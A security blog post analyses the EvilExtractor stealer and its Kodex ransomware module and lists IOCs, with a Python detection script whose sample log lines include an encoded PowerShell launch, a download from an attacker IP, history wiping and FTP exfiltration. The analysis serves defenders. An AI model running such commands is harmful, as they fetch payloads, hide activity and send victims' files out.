Microsoft Windows is the most widely used computer operating system in the world, which also makes it the most targeted platform for data theft. A new attack tool, developed by a company called Kodex, targets the Windows operating system and steals data from it.
In this article, we will discuss the new EvilExtractor stealer and present a technical analysis of the malware.
What is EvilExtractor?
EvilExtractor is a tool that targets Windows operating systems and extracts data and files from endpoint devices through an FTP service. It was developed by Kodex, who claims it is an educational tool, but malware researchers suggest that cybercriminals are using it as an information stealer. The tool includes multiple modules that can be used for extracting data.
By March 2023, there was a huge spike in communication with the host evilextractor[.]com. EvilExtractor camouflages itself as a genuine file such as an Adobe PDF or a Dropbox document, then launches malicious PowerShell activity and applies anti-VM checks. Its primary aim is to extract browser data and other information from compromised endpoints and upload it to the attacker’s FTP server.

EvilExtractor for sale on the dark web (credits: Fortinet)
Technical Analysis - EvilExtractor
The attack begins with a phishing email that asks the recipient to confirm an account and carries a malicious attachment, which disguises itself with the icon of a legitimate decompressed Adobe PDF file.
The malicious file is actually a Python executable program. When the recipient opens the file, a PyInstaller file runs and initiates a .NET loader that utilizes a PowerShell script encoded in base64 to start an EvilExtractor executable.
During its initial execution, the malware will verify the system’s hostname and time to identify whether it is operating in a virtual environment or a sandbox for analysis purposes. If detected, it will terminate its operation.
The primary code of EvilExtractor is obtained by decrypting the .py file. The malware consists of 7 attack modules that operate over FTP services:
- password and cookie extractor
- screen and webcam extractor
- credential extractor
- keylogger
- desktop extractor
- all-in-one extractor (bundles previous extractor options)
- Kodex ransomware
The program first verifies that the current date falls between 2022-11-09 and 2023-04-12. If it does not, the program erases the data in PSReadLine and terminates. Additionally, the program checks whether the product model matches any of the listed virtual machine names, such as VirtualBox, VMware and Hyper-V. It also compares the victim’s hostname against a list of 187 machine names belonging to VirusTotal and other scanners and virtual machines.

EvilExtractor doing device check (credits: Fortinet)
If the environment check passes, EvilExtractor downloads three components from http://193[.]42[.]33[.]232. All downloaded components are obfuscated with PyArmor. The files are:
- “KK2023.zip” – a tool that collects browser data, extracting cookies from popular browsers and saving the results in an “IMP_Data” folder
- “Confirm.zip” – keylogger
- “MnMs.zip” – webcam extractor
EvilExtractor also fetches files with extensions such as jpg, png, mp4, mp3 and pdf from the Desktop and Download directories, and takes screenshots using the CopyFromScreen method.
Kodex Ransomware
Once executed, Kodex compresses the victim’s files using 7-Zip. It saves a list of the compressed file names to Encrypted_files.txt, then adds the compressed files to a password-protected archive that is dropped on the victim’s desktop.
The attacker’s ransom note appears in HTML format on the victim’s browser, along with a countdown timer of 24 hours, demanding a ransom payment to the attacker’s Bitcoin wallet address for a decryption key. A screenshot of the victim’s desktop displaying the ransom note is captured and transmitted, along with Encrypted_files.txt, to the attacker’s EvilExtractor server via FTP. The IP address of the FTP server used by the analyzed sample was 89.117.169[.]78.

Kodex Ransomware notes (credits: Fortinet)
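As an added example (not from the article or from Fortinet's analysis), the following Python triage script runs rule matches over constructed PowerShell, Sysmon and proxy log lines for the behaviours described in the two sections above: the staged downloads, PSReadLine wiping and VM checks of the loader, and the 7-Zip archiving performed by the Kodex module. The ATT&CK ids, host, file names and IPs come from the article; the regexes, the log formats and the WMI Win32_ComputerSystem query are my assumptions.

```python
import re
from collections import defaultdict

# Detection rules keyed by the ATT&CK ids listed in the article. The regexes are my own
# assumptions about how each behaviour surfaces in PowerShell 4104 / Sysmon / proxy
# telemetry; only the host, component names and IPs are taken from the article.
RULES = [
    ("T1059.001", "base64-encoded PowerShell launch",
     re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("T1105", "contact with EvilExtractor staging host",
     re.compile(r"193\.42\.33\.232|evilextractor\.com", re.I)),
    ("T1105", "known EvilExtractor component fetched",
     re.compile(r"\b(KK2023|Confirm|MnMs)\.zip\b", re.I)),
    ("T1562.001", "PSReadLine history wiped",
     re.compile(r"(?=.*PSReadLine)(?=.*(Remove-Item|Clear-Content|Clear-History))", re.I)),
    ("T1071.002", "FTP traffic to a listed attacker server",
     re.compile(r"\bftp\b.*(89\.117\.169\.78|45\.87\.81\.184)", re.I)),
    ("T1497.001", "VM product-model check (assumed WMI query)",
     re.compile(r"Win32_ComputerSystem.*(VirtualBox|VMware|Hyper-V)", re.I)),
    ("Kodex ransomware", "7-Zip password-protected archive built from Encrypted_files.txt",
     re.compile(r"7z(\.exe)?\s+a\b.*\s-p\S*.*Encrypted_files\.txt", re.I)),
]

# Constructed sample telemetry for one host; these are not real captures.
SAMPLE_EVENTS = [
    {"source": "PowerShell/4104", "text": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3..."},
    {"source": "PowerShell/4104", "text": "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'VirtualBox|VMware|Hyper-V') { exit }"},
    {"source": "PowerShell/4104", "text": "Invoke-WebRequest http://193.42.33.232/KK2023.zip -OutFile $env:TEMP\\KK2023.zip"},
    {"source": "PowerShell/4104", "text": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force"},
    {"source": "Sysmon/1", "text": "7z.exe a -pS3cret Encrypted.7z @Encrypted_files.txt"},
    {"source": "Proxy", "text": "CONNECT ftp 89.117.169.78:21 STOR Encrypted_files.txt"},
    {"source": "PowerShell/4104", "text": "Get-ChildItem C:\\Users\\alice\\Documents"},  # benign noise
]

def triage(events):
    """Map each matched ATT&CK id to the distinct behaviours seen in the event set."""
    hits = defaultdict(list)
    for ev in events:
        for tid, desc, rx in RULES:
            if rx.search(ev["text"]) and desc not in hits[tid]:
                hits[tid].append(desc)
    return dict(hits)

def verdict(hits, min_techniques=3):
    """One indicator alone is weak; several distinct techniques on one host is the signal."""
    return "likely EvilExtractor" if len(hits) >= min_techniques else "insufficient evidence"

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for tid, descs in found.items():
        print(tid, "->", "; ".join(descs))
    print(verdict(found))
```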
MITRE ATT&CK Identifiers
- T1105 (Ingress Tool Transfer)
- T1071.002 (File Transfer Protocols)
- T1059.001 (PowerShell)
- T1562.001 (Disable or Modify Tools)
- T1497.001 (System Checks)
IOC
IP Address:
- 45.87.81.184
- 193.42.33.232
- 89.117.169.78
Files:
Conclusion
EvilExtractor is being used as a tool for stealing various types of information while also carrying other malicious capabilities, such as ransomware. Its PowerShell script can evade detection when wrapped in a .NET loader or PyArmor. The developer of this tool has quickly updated numerous functions and improved its reliability.
I hope this article helped you understand the new EvilExtractor stealer and the technical analysis of the malware. Please share this post and help secure the digital world. Visit our social media pages on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium and Instagram, and subscribe to receive updates like this.
Frequently Asked Questions:
EvilExtractor is a tool developed by Kodex that targets Windows operating systems to extract data and files from endpoint devices. It is disguised as a legitimate file like Adobe PDF or Dropbox, initiating malicious PowerShell activities and Anti-VM functions.
EvilExtractor was developed by a company named Kodex.
The primary aim of EvilExtractor is to extract browser data and other information from compromised endpoints and upload it to the attacker’s FTP server.
EvilExtractor starts with a phishing email containing a malicious attachment disguised as a legitimate file. Once opened, it runs a Python executable program, which initiates a .NET loader using a PowerShell script to start the EvilExtractor executable. It has seven attack modules operating over FTP services, each designed for a specific type of data extraction.
EvilExtractor checks if the system is operating in a virtual environment or a sandbox by verifying the system’s hostname and time. If such an environment is detected, it terminates its operation.
Kodex ransomware is part of EvilExtractor’s attack modules. It compresses the victim’s files, saves a list of compressed file names, and adds these to a password-protected archive on the victim’s desktop. A ransom note is displayed on the victim’s browser, demanding a payment to the attacker’s Bitcoin wallet address for a decryption key.
The blog post does not mention specific measures against EvilExtractor. However, generally, it is crucial to maintain up-to-date antivirus software, be wary of suspicious emails and attachments, regularly back up important data, and stay informed about the latest cybersecurity threats.
Yes, EvilExtractor has been seen for sale on the dark web.
As per the blog post, EvilExtractor specifically targets the Windows operating system.